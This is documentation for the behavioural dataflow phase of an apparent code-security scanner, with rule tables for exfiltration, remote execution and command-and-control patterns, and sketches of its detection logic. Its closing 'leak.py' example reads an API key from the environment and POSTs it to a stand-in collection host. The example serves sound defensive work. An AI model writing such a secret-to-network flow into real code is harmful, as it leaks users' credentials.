Pipeline · Phase 4
Behavioural Analysis — source → sink dataflow.
Phase 4 parses the file (Babel AST for JS/TS, regex extractors for the rest) and tracks how data flows from sources (env vars, file reads, network responses) to sinks (network sends, command exec, eval). It catches what single-pattern matching misses, such as a secret read in one statement and exfiltrated in another.
| Property | Value |
|---|---|
| Latency | <200ms |
| Scope | Write / Edit · 6 languages |
| Engine | BehaviouralAnalyser · 7 dataflow rules |
| Score weight | scoring_weights.behavioural — default 2.0 (heaviest) |
| Short-circuit | any CRITICAL finding → deny immediately |
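The cross-statement tracking described above can be sketched roughly as follows. This is a minimal illustration only, not the BehaviouralAnalyser's actual code: the two regex patterns and the `find_flows` helper are hypothetical, and they cover only a handful of Python sources and sinks.

```python
import re

# Hypothetical patterns for illustration; the real extractors are not shown in this document.
SOURCE_RE = re.compile(r"^\s*(\w+)\s*=\s*.*\b(os\.environ|os\.getenv|open\()")
SINK_RE = re.compile(
    r"\b(requests\.(?:post|put|get)|subprocess\.run|os\.system|eval)\s*\((.*)\)"
)


def find_flows(code):
    """Return (variable, source_line, sink_line) for each tainted variable that reaches a sink."""
    tainted = {}  # variable name -> line number where it was assigned from a source
    flows = []
    for lineno, line in enumerate(code.splitlines(), start=1):
        src = SOURCE_RE.search(line)
        if src:
            tainted[src.group(1)] = lineno
            continue
        sink = SINK_RE.search(line)
        if sink:
            args = sink.group(2)
            for var, src_line in tainted.items():
                # A tainted name appearing in the sink's arguments counts as a flow.
                if re.search(rf"\b{re.escape(var)}\b", args):
                    flows.append((var, src_line, lineno))
    return flows


sample = 'key = os.environ["API_KEY"]\nrequests.post(url, data=key)\n'
print(find_flows(sample))  # [('key', 1, 2)]
```

Neither line is conclusive on its own; the finding comes from linking the assignment on line 1 to the call on line 2. A real analyser would also need to follow reassignments, function calls, and scopes, which this sketch ignores.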
Languages
| Language | Parser | Extensions |
|---|---|---|
| JavaScript / TypeScript | Babel AST | .js .ts .jsx .tsx .mjs .cjs |
| Python | Regex | .py .pyw |
| Shell | Regex | .sh .bash .zsh .fish .ksh |
| Ruby | Regex | .rb .rake .gemspec |
| PHP | Regex | .php .phtml |
| Go | Regex | .go |
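As a rough sketch of how the table above could drive parser selection, the mapping below is copied from the Extensions column. The `pick_parser` function and the `"babel-ast"` / `"regex"` labels are hypothetical names chosen for this example.

```python
from pathlib import Path
from typing import Optional, Tuple

# (language, parser) per extension, taken from the Languages table.
EXTENSIONS = {}
for language, parser, exts in [
    ("JavaScript / TypeScript", "babel-ast", ".js .ts .jsx .tsx .mjs .cjs"),
    ("Python", "regex", ".py .pyw"),
    ("Shell", "regex", ".sh .bash .zsh .fish .ksh"),
    ("Ruby", "regex", ".rb .rake .gemspec"),
    ("PHP", "regex", ".php .phtml"),
    ("Go", "regex", ".go"),
]:
    for ext in exts.split():
        EXTENSIONS[ext] = (language, parser)


def pick_parser(filename: str) -> Optional[Tuple[str, str]]:
    """Return (language, parser) for a supported file, or None if the extension is not listed."""
    return EXTENSIONS.get(Path(filename).suffix.lower())


print(pick_parser("src/app.tsx"))  # ('JavaScript / TypeScript', 'babel-ast')
print(pick_parser("leak.py"))      # ('Python', 'regex')
print(pick_parser("notes.md"))     # None
```

How the analyser treats files with no listed extension is not stated here; returning `None` is simply this sketch's choice.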
The 7 dataflow rules
| Rule | Severity | Detection |
|---|---|---|
| DATAFLOW_EXFIL | CRIT | Secret or credential flows to a network sink |
| DATAFLOW_RCE | CRIT | Network response flows to eval / exec |
| DATAFLOW_CMD_INJECT | HIGH | User input flows to a command execution sink |
| DATAFLOW_EVAL | HIGH | Data flows to eval / Function constructor |
| CAPABILITY_C2 | HIGH | Skill/file has both exec + network capabilities |
| CAPABILITY_EVAL | HIGH | Skill/file uses dynamic code evaluation |
| CROSS_FILE_FLOW | MED | Data crosses file boundaries |
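To illustrate how these severities interact with the short-circuit behaviour (any CRITICAL finding leads to an immediate deny), here is a small sketch. The severities come from the table; the `decide` function and its `"deny"` / `"continue"` return values are assumptions made for the example.

```python
# Severities copied from the rules table; everything else here is illustrative.
RULE_SEVERITY = {
    "DATAFLOW_EXFIL": "CRITICAL",
    "DATAFLOW_RCE": "CRITICAL",
    "DATAFLOW_CMD_INJECT": "HIGH",
    "DATAFLOW_EVAL": "HIGH",
    "CAPABILITY_C2": "HIGH",
    "CAPABILITY_EVAL": "HIGH",
    "CROSS_FILE_FLOW": "MEDIUM",
}


def decide(findings):
    """Return "deny" at the first CRITICAL rule id, otherwise "continue"."""
    for rule_id in findings:
        if RULE_SEVERITY.get(rule_id) == "CRITICAL":
            return "deny"  # short-circuit: stop at the first CRITICAL finding
    return "continue"


print(decide(["CAPABILITY_EVAL", "DATAFLOW_EXFIL"]))  # deny
print(decide(["CROSS_FILE_FLOW"]))                    # continue
```

Non-critical findings fall through to scoring, where the behavioural weight applies.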
Why it's the heaviest weight
Dataflow tracking has a much lower false-positive rate than pattern matching alone: a match means the analyser found an actual path from a sensitive source to a dangerous sink in the parsed file, not just a suspicious token. That's why scoring_weights.behavioural defaults to 2.0 (vs 1.0 for runtime/static/llm). Turn it down only if you trust your code reviewers more than the analyser.
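The effect of the 2.0 default can be seen in a small worked example. How the pipeline actually combines phase scores is not documented here, so the weighted average below is purely an assumption, as is the `combined_score` name; only the weight keys and default values come from the text above.

```python
# Default weights as stated above: behavioural 2.0, the other phases 1.0.
DEFAULT_WEIGHTS = {"behavioural": 2.0, "runtime": 1.0, "static": 1.0, "llm": 1.0}


def combined_score(phase_scores, weights=DEFAULT_WEIGHTS):
    """Weighted average over the phases that reported a score (assumed formula)."""
    total_weight = sum(weights[phase] for phase in phase_scores)
    if total_weight == 0:
        return 0.0
    weighted_sum = sum(score * weights[phase] for phase, score in phase_scores.items())
    return weighted_sum / total_weight


scores = {"behavioural": 0.88, "static": 0.2}
flat = {"behavioural": 1.0, "runtime": 1.0, "static": 1.0, "llm": 1.0}

print(round(combined_score(scores), 3))        # 0.653 with the default weights
print(round(combined_score(scores, flat), 3))  # 0.54 if behavioural were weighted 1.0
```

Under this assumed formula, lowering the behavioural weight pulls the combined score toward the weaker signals from the other phases.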
Example
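# leak.py
import os
import requests
url = "https://example.com/collect"  # hypothetical endpoint, added so the snippet runs
key = os.environ["API_KEY"]  # source
requests.post(url, data=key)  # sink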
DATAFLOW_EXFIL · 0.88